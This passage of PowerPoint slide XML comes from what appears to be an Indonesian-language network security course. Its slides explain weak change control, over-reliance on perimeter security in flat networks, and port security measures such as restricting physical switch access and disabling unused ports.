              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menciptakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dokumentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kurangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>visibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagaimana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukungnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketergantungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>berlebihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> perimeter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>datar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>yaitu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghubungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host lain), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menembus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebebasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergerak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyerang</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CB01ABFF-EA85-4275-9F47-ADE2D33AB565}" type="slidenum">
              <a:rPr lang="en-ID" smtClean="0"/>
              <a:t>97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386116420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Keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peluang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Aktor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meluncurkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> switch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>staf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwenang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>letakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lemari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, port switch yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disambungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinonaktifkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>administratif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
